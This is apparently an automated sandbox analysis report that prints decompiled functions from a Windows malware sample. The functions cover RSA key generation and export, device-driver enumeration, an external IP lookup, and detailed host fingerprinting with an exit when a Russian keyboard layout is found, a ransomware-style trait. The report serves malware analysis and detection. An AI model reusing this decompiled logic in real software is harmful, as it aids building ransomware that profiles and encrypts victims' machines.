							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FE682CD
VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 0FE682FB
GetModuleHandleA.KERNEL32(?), ref: 0FE6834F
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FE6835D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FE6836C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FE683B5
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE683C3
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FE683D7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE683E5

Strings

Advapi32.dll, xrefs: 0FE68359, 0FE6835C
CryptGenRandomAdvapi32.dll, xrefs: 0FE68367, 0FE6836A

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: aeb629836da770ade52472ff733264591b5f55d0be2a972f847363c4dcdc845e
Instruction ID: 8211be7ff20d0244680cc93a6a5fa79c4c01d2d79d7c729c74c53b9d193f6770
Opcode Fuzzy Hash: aeb629836da770ade52472ff733264591b5f55d0be2a972f847363c4dcdc845e
Instruction Fuzzy Hash: B231F370A4020DABDB108FE5DC49BEFBB79FF05785F144029E901A6240EB74AA11CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0FE663E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0FE663E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

APIs

CryptAcquireContextW.ADVAPI32(0FE64B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0FE64B96,?,0FE64B9E), ref: 0FE663F8
GetLastError.KERNEL32(?,0FE64B9E), ref: 0FE66402
CryptAcquireContextW.ADVAPI32(0FE64B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FE64B9E), ref: 0FE6641E
CryptGenKey.ADVAPI32(0FE64B9E,0000A400,08000001,?,?,0FE64B9E), ref: 0FE6644A
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0FE6646E
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0FE66486
CryptDestroyKey.ADVAPI32(?), ref: 0FE66490
CryptReleaseContext.ADVAPI32(0FE64B9E,00000000), ref: 0FE6649C
CryptAcquireContextW.ADVAPI32(0FE64B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0FE664B1

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0FE663ED, 0FE66413, 0FE664A6

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: b6699d73ad44dc5e52c8ac452255c6ce57a431b82ac49034d444291db659c4f3
Instruction ID: 9ebf349fbfb273d4bbb029c8e6cab79e5e808daa84d67b8359dc6136c9b56130
Opcode Fuzzy Hash: b6699d73ad44dc5e52c8ac452255c6ce57a431b82ac49034d444291db659c4f3
Instruction Fuzzy Hash: 43219D74B9030DBBEB20CAE1DC4AFDB372AAB48B85F104414F601FA0C0D6B9A9109B61

Uniqueness

Uniqueness Score: -1.00%

Function 0FE62F50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0FE62F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

APIs

K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0FE62F74
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 0FE62F8D

Strings

iqt, xrefs: 0FE62FE3

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID: iqt
API String ID: 4140748134-2805759263
Opcode ID: b3039c7fc5b20004d0e054c35b079b1222fe9a3fb6c9b2280910de691902374f
Instruction ID: b30e1f2fcbc006f9c529a997b23d17b065fdf4fa2ff841de3ce22fc2e4cc23fd
Opcode Fuzzy Hash: b3039c7fc5b20004d0e054c35b079b1222fe9a3fb6c9b2280910de691902374f
Instruction Fuzzy Hash: C621DA72A4021DBBEB109E999C41FEA77BCEB44755F0001B7FE04F6180DB75A9159B90

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66FF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 0FE67E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FE68024
Part of subcall function 0FE67E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FE6803D

VirtualAlloc.KERNELBASE(00000000,00002801,00003000,00000040,747166A0,?), ref: 0FE6700F
lstrlenW.KERNEL32(0FE6FF8C), ref: 0FE6701C

Part of subcall function 0FE68050: InternetCloseHandle.WININET(?), ref: 0FE68063
Part of subcall function 0FE68050: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FE68082

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0FE6FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FE6704B
wsprintfW.USER32 ref: 0FE67063
VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0FE6FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FE67079
InternetCloseHandle.WININET(?), ref: 0FE67087

Strings

ipv4bot.whatismyipaddress.com, xrefs: 0FE6703C
GET, xrefs: 0FE67024

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: 8b8a470fe4c75918370911483bf36ee21e317b9b2fb7581fc0ff95fec3977c9c
Instruction ID: 927acce673895746b8d9839a93cb2c5effdae17ad5fd0ffc8ca6b48ba7e4f20b
Opcode Fuzzy Hash: 8b8a470fe4c75918370911483bf36ee21e317b9b2fb7581fc0ff95fec3977c9c
Instruction Fuzzy Hash: 35019635A8020C7BD6206A66AD4DF9B3E29AB82FA1F001035F904E1081DE685515C7B5

Uniqueness

Uniqueness Score: -1.00%

Function 0FE67490 Relevance: 144.0, APIs: 55, Strings: 27, Instructions: 499
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0FE67490(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				WCHAR* _t157;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t164;
				signed int _t166;
				int _t178;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t221;
				void* _t224;
				WCHAR* _t226;
				long _t229;
				int _t230;
				long _t234;
				void* _t238;
				long _t240;
				long _t243;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260); // executed
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								_t221 = E0FE67410(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
								if(_t221 == 0) {
									_push(_t260);
									E0FE67410(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0FE67B70(_t279 + 0x2c,  &_v28); // executed
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0FE67410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0FE67410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0FE66FF0(_t154); // executed
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x7c) = _t157;
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xfe6f350; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t164 = GetDriveTypeW( &_v40); // executed
										_t270 = _t164;
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
											if(_t178 == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0FE68AB0(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0FE68AB0(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0FE67B60) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0FE67B4C))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t279 + 0x44) = _t226;
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
							if(_t229 != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
							if(_t234 != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12); // executed
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000); // executed
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
					if(_t240 != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
					if(_t243 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0FE67410(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0FE674B7
GetUserNameW.ADVAPI32(00000000,?), ref: 0FE674C8
VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0FE674E6
GetComputerNameW.KERNEL32 ref: 0FE674F0
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FE67510
wsprintfW.USER32 ref: 0FE67551
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FE6756E
RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FE67592
RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0FE64810,?), ref: 0FE675B6
GetLastError.KERNEL32 ref: 0FE675C9
RegCloseKey.KERNELBASE(00000000), ref: 0FE675D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FE675EF
VirtualAlloc.KERNELBASE(00000000,0000008A,00003000,00000004), ref: 0FE6760D
VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0FE67623
wsprintfW.USER32 ref: 0FE6763D
RegOpenKeyExW.KERNELBASE(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0FE6765F
RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,0FE64810,?), ref: 0FE67681
GetLastError.KERNEL32 ref: 0FE67694
RegCloseKey.KERNELBASE(?), ref: 0FE6769D
lstrcmpiW.KERNEL32(0FE64810,00000419), ref: 0FE676B1
wsprintfW.USER32 ref: 0FE676DE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE676ED
VirtualAlloc.KERNELBASE(00000000,00000082,00003000,00000004), ref: 0FE6770D
wsprintfW.USER32 ref: 0FE67756
GetNativeSystemInfo.KERNELBASE(?), ref: 0FE67765
VirtualAlloc.KERNELBASE(00000000,00000040,00003000,00000004), ref: 0FE67776
wsprintfW.USER32 ref: 0FE6779A
ExitProcess.KERNEL32 ref: 0FE677A1
wsprintfW.USER32 ref: 0FE677C9
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0FE67807
VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0FE6781A
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0FE67824
GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0FE6785E
lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FE67890
wsprintfW.USER32 ref: 0FE678C8
lstrcatW.KERNEL32(?,0000060C), ref: 0FE678DD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0FE678E9
GetProcAddress.KERNEL32(00000000), ref: 0FE678F0
lstrlenW.KERNEL32(?), ref: 0FE67900
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE67931

Part of subcall function 0FE67B70: VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,747166A0,?,775EC0B0), ref: 0FE67B8D
Part of subcall function 0FE67B70: VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0FE67C01
Part of subcall function 0FE67B70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FE67C16
Part of subcall function 0FE67B70: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE67C2C

VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0FE67988
GetDriveTypeW.KERNELBASE(?), ref: 0FE679CF
lstrcatW.KERNEL32(?,?), ref: 0FE679F6
lstrcatW.KERNEL32(?,0FE7030C), ref: 0FE67A08
lstrcatW.KERNEL32(?,0FE70380), ref: 0FE67A12
GetDiskFreeSpaceW.KERNELBASE(?,?,0FE64810,?,00000000), ref: 0FE67A28
lstrlenW.KERNEL32(?,?,00000000,0FE64810,00000000,00000000,00000000,0FE64810,00000000), ref: 0FE67A70
wsprintfW.USER32 ref: 0FE67A8A
lstrlenW.KERNEL32(?), ref: 0FE67A98
wsprintfW.USER32 ref: 0FE67AAC
lstrcatW.KERNEL32(?,0FE703A0), ref: 0FE67ABF
lstrcatW.KERNEL32(?,0FE703A4), ref: 0FE67ACB
lstrlenW.KERNEL32(?), ref: 0FE67AE6
VirtualAlloc.KERNELBASE(00000000,00000081,00003000,00000004), ref: 0FE67B09
VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0FE67B30

Strings

%I64u/, xrefs: 0FE67A84
ARM, xrefs: 0FE677AE
error, xrefs: 0FE6774E
Control Panel\International, xrefs: 0FE67581
x86, xrefs: 0FE677BC
%I64u, xrefs: 0FE67AA3
undefined, xrefs: 0FE67549
LocaleName, xrefs: 0FE675AE
?:\, xrefs: 0FE679AD
WORKGROUP, xrefs: 0FE67541
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0FE67876, 0FE678AB
Unknown, xrefs: 0FE677C3
Itanium, xrefs: 0FE677B5
00000419, xrefs: 0FE676A9
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 0FE67525
@, xrefs: 0FE6759F
x64, xrefs: 0FE677A7
iqt, xrefs: 0FE676B1
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 0FE6773F
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0FE6771B
Domain, xrefs: 0FE67520
RtlComputeCrc32, xrefs: 0FE678DF
ProcessorNameString, xrefs: 0FE67871
Identifier, xrefs: 0FE678A6
productName, xrefs: 0FE67716, 0FE6773A
ntdll.dll, xrefs: 0FE678E4
Keyboard Layout\Preload, xrefs: 0FE67655

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
